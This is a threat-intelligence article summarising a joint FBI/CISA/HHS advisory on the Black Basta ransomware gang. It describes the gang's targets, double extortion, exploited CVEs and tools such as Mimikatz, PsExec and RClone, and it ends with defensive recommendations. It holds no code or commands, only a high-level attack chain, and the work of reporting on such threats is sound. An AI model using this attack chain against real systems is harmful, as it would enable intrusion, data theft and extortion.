Black Basta Ransomware Threatens Critical Infrastructure and Healthcare

Active since April 2022 with an attack portfolio encompassing over 500 victims as of May 2024, the Black Basta ransomware gang poses a severe threat to organizations worldwide. In the #StopRansomware advisory report, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have raised alarms about the Black Basta ransomware gang. This ransomware variant has wreaked havoc across multiple sectors since its emergence. The gang's affiliates have targeted a wide range of entities, including at least 12 out of 16 critical infrastructure sectors. The government advisory particularly stresses the risk to the healthcare sector due to its dependency on technology and the potential for severe disruptions to patient care. Operationally, Black Basta employs a double-extortion model, giving victims a short window to pay the ransom, typically 10 to 12 days, before their data is published on the group's Tor site, Basta News. The ransomware gang's ability to disrupt operations and steal critical data poses a severe threat to organizations worldwide.

Understanding the technical details of Black Basta's operations is crucial. The federal agency consolidated technical details of known tactics and techniques utilized by the ransomware gang. Initial access is often gained through spearphishing and exploiting known vulnerabilities. Specifically, the recent ConnectWise ScreenConnect vulnerability (CVE-2024-1709) is exploited, which federal agencies added to their Known Exploited Vulnerabilities Catalog in February 2024. During the discovery and execution phase, Black Basta affiliates use tools such as the SoftPerfect network scanner and conduct reconnaissance for open ports and services to exploit. Lateral movement is facilitated by exploiting any open services and using tools like BITSAdmin, PsExec, and Remote Desktop Protocol (RDP). Privilege escalation often involves using credential scraping tools like Mimikatz and exploiting vulnerabilities such as ZeroLogon (CVE-2020-1472) and PrintNightmare (CVE-2021-34527), along with other vulnerabilities enabling privilege escalations in Windows Active Directory such as sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287).

In the final stages of their attack, Black Basta affiliates use WinSCP or RClone for data exfiltration and disable antivirus products via PowerShell before encrypting with the ChaCha20 algorithm and RSA-4096 public key. Encrypted files are designated with the .basta file extension. They also use tools like vssadmin.exe to delete volume shadow copies, further complicating recovery efforts. To defend against such threats, CISA recommends organizations keep systems updated, implement phishing-resistant Multi-Factor Authentication (MFA), and train users to recognize phishing attempts. Securing remote access software, making regular backups, and following recommendations from the StopRansomware Guide are also critical steps. Healthcare organizations, given their particular vulnerabilities, should prioritize these defenses to mitigate the risks posed by ransomware gangs like Black Basta.

Concerns over Black Basta's activities against healthcare organizations were elevated by the recent cyberattack against the Ascension healthcare network. The disruptions to their operations have been attributed to the Black Basta ransomware gang. Further underscoring the severity of the Black Basta ransomware gang are their potential relationships with other prolific cybercrime groups, including the former Conti and BlackMatter ransomware gangs and threat group FIN7.